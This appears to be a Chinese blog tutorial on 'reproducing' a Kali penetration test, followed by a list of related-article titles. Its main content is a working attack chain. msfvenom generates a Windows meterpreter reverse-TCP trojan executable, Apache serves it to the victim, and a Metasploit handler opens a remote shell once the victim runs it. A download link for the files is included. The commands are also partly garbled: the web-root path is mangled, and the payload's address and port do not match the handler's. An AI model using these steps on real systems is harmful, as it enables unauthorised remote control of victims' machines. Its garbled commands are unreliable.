Kali渗透测试复现

  • 所需环境

所需环境

Vmware
Kali Linux(IP:192.168.145.128)
Windows 7 or Windows 10

打开终端,输入msfconsole

然后生成一个木马代码如下

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.127.128 LPORT=4444 -f exe > 1.exe

然后打开一个新的终端输入

service apache2 start
rm ar/wwwml/*
cp 1.exe ar/wwwml/

开启Apache服务

再回到MetaSploit,输入

use exploit/multi/handler

设置PAYLOAD
我们这就用TCP连接,所以用这个PAYLOAD

set payload windows/meterpreter/reverse_tcp

再设置下ip和端口

set LHOST 192.168.145.128
set LPORT 5555

然后全部设置完了直接exploit运行,再在靶机上下载木马打开就可以进入系统了

进入系统看看
输入shell

具体教程复现需要的文件下载地址:
链接:https://pan.baidu.com/s/1BBbPo5YPpiWe2y47OyA-tA
提取码:zr2w

kali渗透测试实战操作相关推荐

  1. Kali渗透测试-远程控制:6200端口变成“后门”

    Kali渗透测试-远程控制:6200端口变成"后门" 测试环境 攻击机:Linux kali 5.16.0-kali7-amd64 (IP:192.168.68.248) 靶机:M ...

  2. Kali渗透测试:使用Armitage针对漏洞进行攻击

    Kali渗透测试:使用Armitage针对漏洞进行攻击 以ms17_010_eternable模块为例("永恒之蓝")经典的漏洞,单击这个模块以后就可以开始攻击了. 实 验 环 境 ...

  3. Kali渗透测试:使用browser_autopwn2模块进行渗透攻击

    Kali渗透测试:使用browser_autopwn2模块进行渗透攻击 如果觉得一个一个地选择模块很麻烦, 也可以使用browser_autopwn模块.这种攻击的思路是渗透者构造一个攻击用的Web服 ...

  4. kali渗透测试系列---信息收集

    kali 渗透测试系列 文章目录 kali 渗透测试系列 信息收集 信息收集 信息收集阶段可以说是在整个渗透测试或者攻击很重要的阶段,毕竟知己知彼才能百战百胜,否则从目标主机使用的平台到数据库的使用再 ...

  5. Kali渗透测试:网络数据的嗅探与欺骗

    Kali渗透测试:网络数据的嗅探与欺骗 无论什么样的漏洞渗透模块,在网络中都是以数据包的形式传输的,因此如果我们能够对网络中的数据包进行分析,就可以掌握渗透的原理. 另外,很多网络攻击的方法也都是发送 ...

  6. 学习Kali渗透测试笔记

    Kali渗透测试 一.什么是渗透测试 1. 软件测试 2. 安全测试与渗透测试 3.渗透测试 二.渗透测试的目标 1. 网络硬件设备 2. 主机操作系统 3. 应用系统 4. 数据库系统 三.渗透测试 ...

  7. Kali渗透测试:身份认证攻击

    Kali渗透测试:身份认证攻击 1.1 简单网络服务认证的攻击 网络上很多常见的应用都采用了密码认证的方式,如SSH.Telnet.FTP等.这些应用被广泛应用在各种网络设备上,如果这些认证模式出现问 ...

  8. ​kali渗透测试环境搭建

    推荐阅读 ​kali渗透测试环境搭建 https://m.weishi100.com/mweb/series/?id=1373351 https://m.weishi100.com/mweb/seri ...

  9. Kali渗透测试:远程控制被控端免杀及DLL生成、注入反弹

    Kali渗透测试:远程控制被控端免杀及DLL生成.注入反弹 ​ 长期以来,杀毒软件厂商和黑客一直处于博弈的状态,杀毒软件厂商研究了各种检测和清除远程控制被控端的方法,而黑客也在一直致力于研究避开检测的 ...

最新文章

  1. NLP实践:对话系统技术原理和应用
  2. ICLR2020 NLP优秀论文分享(附源码)
  3. Spring MVC-09循序渐进之文件上传(基于Servlet3.0+内置功能)
  4. springboot接收浏览器发送delete请求( method not allowed 405解决方法)
  5. python内存管理_Python内存管理(一):预备知识
  6. 【操作系统】部分概念解释题
  7. 转转Q1手机行情:iPhone13开始“飘香” 二手5G手机市场苹果占一半
  8. CSS 元素超出部分滚动, 并隐藏滚动条
  9. 请问,非计算机专业,只为软考中级,哪一种最容易过?
  10. 黑马Redis学习——实战篇(4)
  11. Arrays.copyOf()方法用法
  12. Web服务器的配置与应用
  13. 真正想做的人,什么都不说
  14. 设计模式----工厂
  15. 1000以内完数Java程序
  16. 引流获客哪个渠道比较好?
  17. windows2008 iis7环境SSL部署https多站点
  18. 线上内存溢出原因排除
  19. 深入Go语言网络库的基础实现
  20. ffmpeg 视频转码软件

热门文章

  1. vue项目中vue-scroller实现上拉加载和下拉刷新
  2. 关于C语言中的换行问题
  3. VMware软件安装(超详细)
  4. DISN:Deep Implicit Surface Network for High-quality Single-view 3D Reconstruction
  5. 一个程序员的电脑系统文件夹组织规则
  6. 中正平和的机器人学笔记——7. 一种气驱型柔性臂的逆运动学模型
  7. fgetc/fputc 和 fgets/fputs 的详细用法
  8. 学好python能干嘛-学Python后到底能干什么
  9. 【spark】Spark原理
  10. linux大于2T硬盘分区方法